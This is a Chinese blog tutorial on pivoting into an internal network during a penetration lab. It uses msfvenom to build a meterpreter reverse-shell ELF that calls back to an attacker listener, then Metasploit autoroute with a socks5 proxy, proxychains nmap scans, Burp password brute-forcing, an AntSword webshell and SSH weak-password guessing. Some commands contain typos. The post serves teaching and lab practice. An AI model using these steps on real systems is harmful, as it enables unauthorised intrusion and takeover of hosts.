评论

收藏

[其他] 内网*** - 代理篇(MSF代理)

网络安全 网络安全 发布于:2021-07-05 15:04 | 阅读数:342 | 评论:0

  男孩和青春只限于校园,踏出校园就要当成熟稳重的男人。。。
  ----  网易云热评
  声明:贝塔安全实验室公众号文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!
  请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!
  START
  0x01前言
  本‍‍‍‍次所使用的***机为kali linux系统,***过程中涉及到的工具主要有:中国菜刀/中国蚂剑,burpsuite,metasploit,MobaXterm,一句话***,proxychains,nmap脚本等。***的拓扑结构如下图所示。
DSC0000.png

  0x02反弹Payload
  ***机进行监听设置(注意:监听主机设置需要与生成的payload保持一致):

  •  
>>> use exploit/multi/handler>>> set payloads linux/x64/meterpreter_reverse_tcp>>> set LHOST 192.168.124.15    #监听主机ip地址>>> set PORT 9999          #监听主机端口号>>> exploit -j
DSC0001.png

  生成反弹需要的payload文件:

  •  
>>> msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=IP LPORT =PORT -f elf > shell.elf
DSC0002.png

  将生成的文件上传到目标主机,并更改payload可执行权限,并执行。

  •  
>>> chmod 777 shell.elf>>> ./shell.elf
DSC0003.png

DSC0004.png

  在***端,监听的主机收到目标主机反弹的shell权限,如下图所示:
DSC0005.png

  0x03添加socks5代理
  此时为了能够访问到内网,需要进行添加代理操作。查看当前路由有一个内网段ip地址段位172.17.0.0/24。
DSC0006.png

  执行指令添加路由操作。

  •  
>>> run autoroute -s 172.17.0.0/24
DSC0007.png

  添加socks5代理:

  •  
>>> use auxiliary/server/socks5>>> run
DSC0008.png

  此处应用proxychains工具,进行内网探测,使用编辑器在文件/etc/proxychains.conf的最后一行加入socks5代理的配置信息。
  --- snippet ---
  [ProxyList]
  # add proxy here ...
  # meanwile
  # defaults set to "tor"
  socks5  127.0.0.1 1080
  0x04内网主机端口探测
  通过执行代理工具proxychains,内网web服务进行探测,可以发现主机ip地址为172.17.0.4。执行指令如下所示:

  •  
>>> Proxychains nmap 172.17.0.0/24 -sV  -sT  -Pn  -T 4 -p80
DSC0009.png

  0x05内网web暴力破解
  此时通过浏览器是不能访问到内网服务器,需要在浏览器配置代理进行访问,配置代理类型选择socks5,本地端口为1080。配置好以后,就能通过代理访问内网主机的web应用了。
DSC00010.png

  通过浏览页面可发现,为一个文件上传页面,但是上传需要输入口令,方可操作成功。此时考虑可通过burpsuite进行拦截后,口令破解。
DSC00011.png

  打开burpsuite后,需要添加代理,这样才能将拦截到的数据正确发送到目标服务器,配置过程如下所示:
DSC00012.png

DSC00013.png

  对拦截的数据更改口令字段,添加常用字典,此处用的字典为:top1000.txt。查看破解成功字段的真实口令为password。
DSC00014.png

  0x06内网上传webshell
  常用的菜刀,Cknife等工具并不存在代理功能,此处使用中国蚁剑工具进行连接,配置蚁剑代理如下所示:
DSC00015.png

DSC00016.png

  成功连接到内网的shell后,访问目标系统不同目录
DSC00017.png

  0x07远程连接内网主机SSH服务
  对内网的22端口进行探测,发现主机172.17.0.8开放22端口,并对该内网主机进行ssh弱口令猜解。

  •  
>>> proxychains nmap -sV -t -Pn -p22 127.17.0.0/24
DSC00018.png

  通过第三方工具MobaXterm添加代理后,远程连接到内网主机,具体操作过程如下所示:
DSC00019.png

DSC00020.png

  - 往期推荐 -
  内网***-代理篇(一)
  欢迎关注公众号:web安全工具库
DSC00021.png


  
关注下面的标签,发现更多相似文章